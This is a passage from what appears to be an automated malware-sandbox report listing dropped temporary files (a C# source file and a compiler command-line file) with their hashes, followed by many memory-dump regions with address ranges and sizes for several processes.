                                                                                      ddccc9bc1b90bb69dbd8dd1dab48c8e37d5e6eec5bb69469089b4b134179049fdd66ace6932940615172c28f6a5ce0c6413b328b39afb6c01efb792821c588b8

                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\o0ks1vei\o0ks1vei.0.cs

                                                                                      Filesize

                                                                                      1004B

                                                                                      MD5

                                                                                      c76055a0388b713a1eabe16130684dc3

                                                                                      SHA1

                                                                                      ee11e84cf41d8a43340f7102e17660072906c402

                                                                                      SHA256

                                                                                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                      SHA512

                                                                                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\o0ks1vei\o0ks1vei.cmdline

                                                                                      Filesize

                                                                                      607B

                                                                                      MD5

                                                                                      0d5c4e037d12c6e92382086b4d66736a

                                                                                      SHA1

                                                                                      9af4700bdf5906b6ec86916bca45e6b0688f2e45

                                                                                      SHA256

                                                                                      8f220673d2774829a4b5d0192933985bb7c63d4ee1fe4d8c97e191afe8c819d1

                                                                                      SHA512

                                                                                      bfe5b8bc8fb6d7ceffe51a1688694c6683d4b2eef392a9ff6d1a15e5bc2296068819d222368eed160d0ec59ac032eda34f6c5da2e48499706f5c4cf93e56afbf

                                                                                    • memory/2252-84-0x0000020E774B0000-0x0000020E774D2000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/3172-48-0x00007FFCF17A0000-0x00007FFCF17AF000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/3172-78-0x00007FFCE8340000-0x00007FFCE845B000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/3172-76-0x00007FFCEDB50000-0x00007FFCEDB5D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3172-68-0x00007FFCE8AD0000-0x00007FFCE8ADD000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3172-306-0x00007FFCD95D0000-0x00007FFCD9CA0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/3172-71-0x00007FFCD95D0000-0x00007FFCD9CA0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/3172-73-0x00007FFCE7FA0000-0x00007FFCE806D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/3172-238-0x00007FFCD8BF0000-0x00007FFCD8D67000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3172-74-0x00007FFCEC1D0000-0x00007FFCEC1F5000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/3172-72-0x00007FFCE8070000-0x00007FFCE80A3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/3172-66-0x00007FFCE84F0000-0x00007FFCE8509000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3172-63-0x00007FFCE8720000-0x00007FFCE8744000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/3172-64-0x00007FFCD8BF0000-0x00007FFCD8D67000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3172-61-0x00007FFCE8770000-0x00007FFCE8789000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3172-58-0x00007FFCD90A0000-0x00007FFCD95C2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3172-56-0x00007FFCE8980000-0x00007FFCE8995000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/3172-54-0x00007FFCE8AE0000-0x00007FFCE8B0D000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/3172-108-0x00007FFCE8720000-0x00007FFCE8744000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/3172-30-0x00007FFCEC1D0000-0x00007FFCEC1F5000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/3172-24-0x00007FFCD95D0000-0x00007FFCD9CA0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/3172-104-0x00007FFCE8980000-0x00007FFCE8995000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/3172-107-0x00007FFCD90A0000-0x00007FFCD95C2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3172-269-0x00007FFCE8070000-0x00007FFCE80A3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/3172-289-0x00007FFCE7FA0000-0x00007FFCE806D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/3172-296-0x00007FFCD90A0000-0x00007FFCD95C2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3172-299-0x00007FFCD8BF0000-0x00007FFCD8D67000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3172-291-0x00007FFCD95D0000-0x00007FFCD9CA0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/3172-292-0x00007FFCEC1D0000-0x00007FFCEC1F5000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/3172-321-0x00007FFCE7FA0000-0x00007FFCE806D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/3172-325-0x00007FFCE8980000-0x00007FFCE8995000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/3172-332-0x00007FFCE8070000-0x00007FFCE80A3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/3172-331-0x00007FFCE8AD0000-0x00007FFCE8ADD000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3172-330-0x00007FFCE84F0000-0x00007FFCE8509000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3172-329-0x00007FFCE8720000-0x00007FFCE8744000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/3172-328-0x00007FFCD8BF0000-0x00007FFCD8D67000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3172-327-0x00007FFCE8770000-0x00007FFCE8789000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3172-326-0x00007FFCD90A0000-0x00007FFCD95C2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3172-324-0x00007FFCE8AE0000-0x00007FFCE8B0D000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/3172-323-0x00007FFCF17A0000-0x00007FFCF17AF000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/3172-322-0x00007FFCEC1D0000-0x00007FFCEC1F5000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/3172-320-0x00007FFCE8340000-0x00007FFCE845B000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/3172-319-0x00007FFCEDB50000-0x00007FFCEDB5D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/4548-182-0x000001CFFD8A0000-0x000001CFFD8A8000-memory.dmp

                                                                                      Filesize

                                                                                      32KB